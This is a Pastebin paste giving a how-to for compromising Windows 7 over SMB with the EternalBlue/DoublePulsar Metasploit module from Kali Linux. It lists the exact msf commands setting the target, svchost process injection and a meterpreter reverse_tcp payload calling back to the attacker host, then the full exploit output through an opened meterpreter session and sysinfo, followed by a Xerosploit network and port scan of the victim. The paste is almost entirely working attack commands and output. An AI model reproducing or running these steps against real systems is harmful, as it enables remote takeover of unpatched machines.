Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
- ' dB' BBP
- dB'dB'dB' dBBP dBP dBP BB
- dB'dB'dB' dBP dBP dBP BB
- dB'dB'dB' dBBBBP dBP dBBBBBBB
- dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
- . . dB' dBP dB'.BP
- | dBP dBBBB' dBP dB'.BP dBP dBP
- --o-- dBP dBP dBP dB'.BP dBP dBP
- | dBBBBP dBP dBBBBP dBBBBP dBP dBP
- .
- .
- o To boldly go where no
- shell has gone before
- ---------------------------------------------------------------------------------------------------------------------------------------
- Exploit vulnerability windows 7 ONLY BY IP using Kali Linux Command eternalblue_doublepulsar (CVE) This module exploits a vulnerability on SMBv1/SMBv2 Protocols through Eternablue.
- Available targets:
- Windows XP (all services pack) (x86) (x64)
- 1 Windows Server 2003 SP0 (x86)
- 2 Windows Server 2003 SP1/SP2 (x86)
- 3 Windows Server 2003 (x64)
- 4 Windows Vista (x86)
- 5 Windows Vista (x64)
- 6 Windows Server 2008 (x86)
- 7 Windows Server 2008 R2 (x86) (x64)
- 8 Windows 7 (all services pack) (x86) (x64)
- ---------------------------------------------------------------------------------------------------------------------------------------
- msf > use exploit/windows/smb/eternalblue_doublepulsar
- msf exploit(eternalblue_doublepulsar) > set rhost 192.168.159.143
- rhost => 192.168.159.143
- msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT svchost.exe
- PROCESSINJECT => svchost.exe
- msf exploit(eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(eternalblue_doublepulsar) > set lhost 192.168.159.147
- lhost => 192.168.159.147
- msf exploit(eternalblue_doublepulsar) > exploit
- [*] Started reverse TCP handler on 192.168.159.147:4444
- [*] 192.168.159.143:445 - Generating Eternalblue XML data
- [*] 192.168.159.143:445 - Generating Doublepulsar XML data
- [*] 192.168.159.143:445 - Generating payload DLL for Doublepulsar
- [*] 192.168.159.143:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
- [*] 192.168.159.143:445 - Launching Eternalblue...
- [+] 192.168.159.143:445 - Pwned! Eternalblue success!
- [*] 192.168.159.143:445 - Launching Doublepulsar...
- [*] Sending stage (957487 bytes) to 192.168.159.143
- [*] Meterpreter session 1 opened (192.168.159.147:4444 -> 192.168.159.143:49167) at 2018-08-18 21:19:11 +0545
- [+] 192.168.159.143:445 - Remote code executed... 3... 2... 1...
- meterpreter > sysinfo
- Computer : WIN-BBCUU0HS2S3
- OS : Windows 7 (Build 7600).
- Architecture : x86
- System Language : en_US
- Domain : WORKGROUP
- Logged On Users : 2
- Meterpreter : x86/windows
- meterpreter > \rmeterpreter > \rmeterpreter >
- ---------------------------------------------------------------------------------------------------------------------------------------
- When you Attack windows 7 first scanning our network Xerosploit command kali linux check port (MICROSOFT-DS) 445 port example down-below
- ---------------------------------------------------------------------------------------------------------------------------------------
- root@kali:~# xerosploit
- ▒██ ██▒▓█████ ██▀███ ▒█████ ██████ ██▓███ ██▓ ▒█████ ██▓▄▄▄█████▓
- ▒▒ █ █ ▒░▓█ ▀ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▓██░ ██▒▓██▒ ▒██▒ ██▒▓██▒▓ ██▒ ▓▒
- ░░ █ ░▒███ ▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄ ▓██░ ██▓▒▒██░ ▒██░ ██▒▒██▒▒ ▓██░ ▒░
- ░ █ █ ▒ ▒▓█ ▄ ▒██▀▀█▄ ▒██ ██░ ▒ ██▒▒██▄█▓▒ ▒▒██░ ▒██ ██░░██░░ ▓██▓ ░
- ▒██▒ ▒██▒░▒████▒░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██▒ ░ ░░██████▒░ ████▓▒░░██░ ▒██▒ ░
- ▒▒ ░ ░▓ ░░░ ▒░ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░░ ▒░▓ ░░ ▒░▒░▒░ ░▓ ▒ ░░
- ░░ ░▒ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ▒ ░ ░
- ░ ░ ░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- [+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]
- [ Powered by Bettercap and Nmap ]
- ┌═════════════════════════════════════════════════════════════════════════════┐
- █ █
- █ Your Network Configuration █
- █ █
- └═════════════════════════════════════════════════════════════════════════════┘
- ╒═════════════════╤═══════════════╤═══════════════╤═════════╤════════════╕
- │ IP Address │ MAC Address │ Gateway │ Iface │ Hostname │
- ╞═════════════════╪═══════════════╪═══════════════╪═════════╪════════════╡
- ├─────────────────┼───────────────┼───────────────┼─────────┼────────────┤
- │ 192.168.159.147 │ │ 192.168.159.2 │ eth0 │ kali │
- ╘═════════════════╧═══════════════╧═══════════════╧═════════╧════════════╛
- ╔═════════════╦════════════════════════════════════════════════════════════════════╗
- ║ ║ XeroSploit is a penetration testing toolkit whose goal is to ║
- ║ Information ║ perform man in the middle attacks for testing purposes. ║
- ║ ║ It brings various modules that allow to realise efficient attacks. ║
- ║ ║ This tool is Powered by Bettercap and Nmap. ║
- ╚═════════════╩════════════════════════════════════════════════════════════════════╝
- [+] Please type 'help' to view commands.
- Xero ➮ scan
- [++] Mapping your network ...
- [+]═══════════[ Devices found on your network ]═══════════[+]
- ╔═════════════════╦═══════════════════╦═══════════════╗
- ║ IP Address ║ Mac Address ║ Manufacturer ║
- ╠═════════════════╬═══════════════════╬═══════════════╣
- ║ 192.168.159.1 ║ 00:50:56:C0:00:08 ║ (VMware) ║
- ║ 192.168.159.2 ║ 00:50:56:E3:BD:88 ║ (VMware) ║
- ║ 192.168.159.143 ║ 00:0C:29:C2:FC:32 ║ (VMware) ║
- ║ 192.168.159.254 ║ 00:50:56:E9:C0:DD ║ (VMware) ║
- ║ 192.168.159.147 ║ ║ (This device) ║
- ║ ║ ║ ║
- ╚═════════════════╩═══════════════════╩═══════════════╝
- [+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.
- Xero ➮ 192.168.159.143
- [++] 192.168.159.143 has been targeted.
- [+] Which module do you want to load ? Enter 'help' for more information.
- Xero»modules ➮ pscan
- ┌══════════════════════════════════════════════════════════════┐
- █ █
- █ Port Scanner █
- █ █
- █ Find open ports on network computers and retrieve █
- █ versions of programs running on the detected ports █
- └══════════════════════════════════════════════════════════════┘
- [+] Enter 'run' to execute the 'pscan' command.
- Xero»modules»pscan ➮ run
- [++] Please wait ... Scanning ports on 192.168.159.143
- [+]═════════[ Port scan result for 192.168.159.143 ]═════════[+]
- ╔═══════════════╦══════════╦═══════╗
- ║ SERVICE ║ PORT ║ STATE ║
- ╠═══════════════╬══════════╬═══════╣
- ║ MSRPC ║ 135/TCP ║ OPEN ║
- ║ NETBIOS-SSN ║ 139/TCP ║ OPEN ║
- ║ MICROSOFT-DS ║ 445/TCP ║ OPEN ║
- ║ MS-WBT-SERVER ║ 3389/TCP ║ OPEN ║
- ║ ║ ║ ║
- ╚═══════════════╩══════════╩═══════╝
- [+] Enter 'run' to execute the 'pscan' command.
- Xero»modules»pscan ➮
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement